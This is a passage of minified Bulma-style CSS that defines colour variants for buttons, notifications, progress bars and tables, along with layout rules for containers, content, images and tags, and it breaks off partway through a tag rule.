.button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#485fc7}.button.is-link.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;color:#485fc7}.button.is-link.is-outlined:hover,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined.is-focused{background-color:#485fc7;border-color:#485fc7;color:#fff}.button.is-link.is-outlined.is-loading:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-outlined.is-loading:hover:after,.button.is-link.is-outlined.is-loading.is-hovered:after,.button.is-link.is-outlined.is-loading:focus:after,.button.is-link.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;box-shadow:none;color:#485fc7}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined:hover,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined.is-focused{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-outlined.is-loading:hover:after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-link.is-inverted.is-outlined.is-loading:focus:after,.button.is-link.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-link.is-light{background-color:#eff1fa;color:#3850b7}.button.is-link.is-light:hover,.button.is-link.is-light.is-hovered{background-color:#e6e9f7;border-color:transparent;color:#3850b7}.button.is-link.is-light:active,.button.is-link.is-light.is-active{background-color:#dce0f4;border-color:transparent;color:#3850b7}.button.is-info{background-color:#3e8ed0;border-color:transparent;color:#fff}.button.is-info:hover,.button.is-info.is-hovered{background-color:#3488ce;border-color:transparent;color:#fff}.button.is-info:focus,.button.is-info.is-focused{border-color:transparent;color:#fff}.button.is-info:focus:not(:active),.button.is-info.is-focused:not(:active){box-shadow:0 0 0 .125em #3e8ed040}.button.is-info:active,.button.is-info.is-active{background-color:#3082c5;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3e8ed0;border-color:#3e8ed0;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted:hover,.button.is-info.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3e8ed0}.button.is-info.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;color:#3e8ed0}.button.is-info.is-outlined:hover,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined.is-focused{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.button.is-info.is-outlined.is-loading:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-outlined.is-loading:hover:after,.button.is-info.is-outlined.is-loading.is-hovered:after,.button.is-info.is-outlined.is-loading:focus:after,.button.is-info.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] .button.is-info.is-outlined{background-color:transparent;border-color:#3e8ed0;box-shadow:none;color:#3e8ed0}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined:hover,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined.is-focused{background-color:#fff;color:#3e8ed0}.button.is-info.is-inverted.is-outlined.is-loading:hover:after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-info.is-inverted.is-outlined.is-loading:focus:after,.button.is-info.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #3e8ed0 #3e8ed0!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eff5fb;color:#296fa8}.button.is-info.is-light:hover,.button.is-info.is-light.is-hovered{background-color:#e4eff9;border-color:transparent;color:#296fa8}.button.is-info.is-light:active,.button.is-info.is-light.is-active{background-color:#dae9f6;border-color:transparent;color:#296fa8}.button.is-success{background-color:#48c78e;border-color:transparent;color:#fff}.button.is-success:hover,.button.is-success.is-hovered{background-color:#3ec487;border-color:transparent;color:#fff}.button.is-success:focus,.button.is-success.is-focused{border-color:transparent;color:#fff}.button.is-success:focus:not(:active),.button.is-success.is-focused:not(:active){box-shadow:0 0 0 .125em #48c78e40}.button.is-success:active,.button.is-success.is-active{background-color:#3abb81;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] .button.is-success{background-color:#48c78e;border-color:#48c78e;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c78e}.button.is-success.is-inverted:hover,.button.is-success.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c78e}.button.is-success.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;color:#48c78e}.button.is-success.is-outlined:hover,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined.is-focused{background-color:#48c78e;border-color:#48c78e;color:#fff}.button.is-success.is-outlined.is-loading:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-outlined.is-loading:hover:after,.button.is-success.is-outlined.is-loading.is-hovered:after,.button.is-success.is-outlined.is-loading:focus:after,.button.is-success.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] .button.is-success.is-outlined{background-color:transparent;border-color:#48c78e;box-shadow:none;color:#48c78e}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined:hover,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined.is-focused{background-color:#fff;color:#48c78e}.button.is-success.is-inverted.is-outlined.is-loading:hover:after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-success.is-inverted.is-outlined.is-loading:focus:after,.button.is-success.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #48c78e #48c78e!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf5;color:#257953}.button.is-success.is-light:hover,.button.is-success.is-light.is-hovered{background-color:#e6f7ef;border-color:transparent;color:#257953}.button.is-success.is-light:active,.button.is-success.is-light.is-active{background-color:#dcf4e9;border-color:transparent;color:#257953}.button.is-warning{background-color:#ffe08a;border-color:transparent;color:#000000b3}.button.is-warning:hover,.button.is-warning.is-hovered{background-color:#ffdc7d;border-color:transparent;color:#000000b3}.button.is-warning:focus,.button.is-warning.is-focused{border-color:transparent;color:#000000b3}.button.is-warning:focus:not(:active),.button.is-warning.is-focused:not(:active){box-shadow:0 0 0 .125em #ffe08a40}.button.is-warning:active,.button.is-warning.is-active{background-color:#ffd970;border-color:transparent;color:#000000b3}.button.is-warning[disabled],fieldset[disabled] .button.is-warning{background-color:#ffe08a;border-color:#ffe08a;box-shadow:none}.button.is-warning.is-inverted{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted:hover,.button.is-warning.is-inverted.is-hovered{background-color:#000000b3}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#ffe08a}.button.is-warning.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;color:#ffe08a}.button.is-warning.is-outlined:hover,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined.is-focused{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.button.is-warning.is-outlined.is-loading:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-outlined.is-loading:hover:after,.button.is-warning.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-outlined.is-loading:focus:after,.button.is-warning.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-outlined{background-color:transparent;border-color:#ffe08a;box-shadow:none;color:#ffe08a}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-warning.is-inverted.is-outlined:hover,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#ffe08a}.button.is-warning.is-inverted.is-outlined.is-loading:hover:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-warning.is-inverted.is-outlined.is-loading:focus:after,.button.is-warning.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #ffe08a #ffe08a!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-warning.is-light{background-color:#fffaeb;color:#946c00}.button.is-warning.is-light:hover,.button.is-warning.is-light.is-hovered{background-color:#fff6de;border-color:transparent;color:#946c00}.button.is-warning.is-light:active,.button.is-warning.is-light.is-active{background-color:#fff3d1;border-color:transparent;color:#946c00}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger:hover,.button.is-danger.is-hovered{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger:focus,.button.is-danger.is-focused{border-color:transparent;color:#fff}.button.is-danger:focus:not(:active),.button.is-danger.is-focused:not(:active){box-shadow:0 0 0 .125em #f1466840}.button.is-danger:active,.button.is-danger.is-active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] .button.is-danger{background-color:#f14668;border-color:#f14668;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted:hover,.button.is-danger.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined:hover,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined.is-focused{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading:hover:after,.button.is-danger.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-outlined.is-loading:focus:after,.button.is-danger.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined:hover,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined.is-focused{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading:hover:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-danger.is-inverted.is-outlined.is-loading:focus:after,.button.is-danger.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light:hover,.button.is-danger.is-light.is-hovered{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light:active,.button.is-danger.is-light.is-active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{font-size:.75rem}.button.is-small:not(.is-rounded){border-radius:2px}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading:after{position:absolute;left:calc(50% - .5em);top:calc(50% - .5em);position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:9999px;padding-left:1.25em;padding-right:1.25em}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){font-size:.75rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large):not(.is-rounded){border-radius:2px}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button:hover,.buttons.has-addons .button.is-hovered{z-index:2}.buttons.has-addons .button:focus,.buttons.has-addons .button.is-focused,.buttons.has-addons .button:active,.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-selected{z-index:3}.buttons.has-addons .button:focus:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-selected:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}@media screen and (max-width: 768px){.button.is-responsive.is-small{font-size:.5625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.65625rem}.button.is-responsive.is-medium{font-size:.75rem}.button.is-responsive.is-large{font-size:1rem}}@media screen and (min-width: 769px) and (max-width: 1023px){.button.is-responsive.is-small{font-size:.65625rem}.button.is-responsive,.button.is-responsive.is-normal{font-size:.75rem}.button.is-responsive.is-medium{font-size:1rem}.button.is-responsive.is-large{font-size:1.25rem}}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none!important;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width: 1024px){.container{max-width:960px}}@media screen and (max-width: 1215px){.container.is-widescreen:not(.is-max-desktop){max-width:1152px}}@media screen and (max-width: 1407px){.container.is-fullhd:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}@media screen and (min-width: 1216px){.container:not(.is-max-desktop){max-width:1152px}}@media screen and (min-width: 1408px){.container:not(.is-max-desktop):not(.is-max-widescreen){max-width:1344px}}.content li+li{margin-top:.25em}.content p:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content ul:not(:last-child),.content blockquote:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sup,.content sub{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:inherit}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-normal{font-size:1rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.icon-text{align-items:flex-start;color:inherit;display:inline-flex;flex-wrap:wrap;line-height:1.5rem;vertical-align:top}.icon-text .icon{flex-grow:0;flex-shrink:0}.icon-text .icon:not(:last-child){margin-right:.25em}.icon-text .icon:not(:first-child){margin-left:.25em}div.icon-text{display:flex}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:9999px}.image.is-fullwidth{width:100%}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio{height:100%;width:100%}.image.is-square,.image.is-1by1{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;position:relative;padding:1.25rem 2.5rem 1.25rem 1.5rem}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:white}.notification pre code{background:transparent}.notification>.delete{right:.5rem;position:absolute;top:.5rem}.notification .title,.notification .subtitle,.notification .content{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:#000000b3}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#485fc7;color:#fff}.notification.is-link.is-light{background-color:#eff1fa;color:#3850b7}.notification.is-info{background-color:#3e8ed0;color:#fff}.notification.is-info.is-light{background-color:#eff5fb;color:#296fa8}.notification.is-success{background-color:#48c78e;color:#fff}.notification.is-success.is-light{background-color:#effaf5;color:#257953}.notification.is-warning{background-color:#ffe08a;color:#000000b3}.notification.is-warning.is-light{background-color:#fffaeb;color:#946c00}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:9999px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,white 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,whitesmoke 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#485fc7}.progress.is-link::-moz-progress-bar{background-color:#485fc7}.progress.is-link::-ms-fill{background-color:#485fc7}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#485fc7 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3e8ed0}.progress.is-info::-moz-progress-bar{background-color:#3e8ed0}.progress.is-info::-ms-fill{background-color:#3e8ed0}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3e8ed0 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c78e}.progress.is-success::-moz-progress-bar{background-color:#48c78e}.progress.is-success::-ms-fill{background-color:#48c78e}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c78e 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffe08a}.progress.is-warning::-moz-progress-bar{background-color:#ffe08a}.progress.is-warning::-ms-fill{background-color:#ffe08a}.progress.is-warning:indeterminate{background-image:linear-gradient(to right,#ffe08a 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress:indeterminate::-ms-fill{animation-name:none}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{0%{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#485fc7;border-color:#485fc7;color:#fff}.table td.is-info,.table th.is-info{background-color:#3e8ed0;border-color:#3e8ed0;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c78e;border-color:#48c78e;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffe08a;border-color:#ffe08a;color:#000000b3}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table td.is-vcentered,.table th.is-vcentered{vertical-align:middle}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(2n){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody tr:not(.is-selected):nth-child(2n){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-top-left-radius:0;border-bottom-left-radius:0}.tags.has-addons .tag:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) 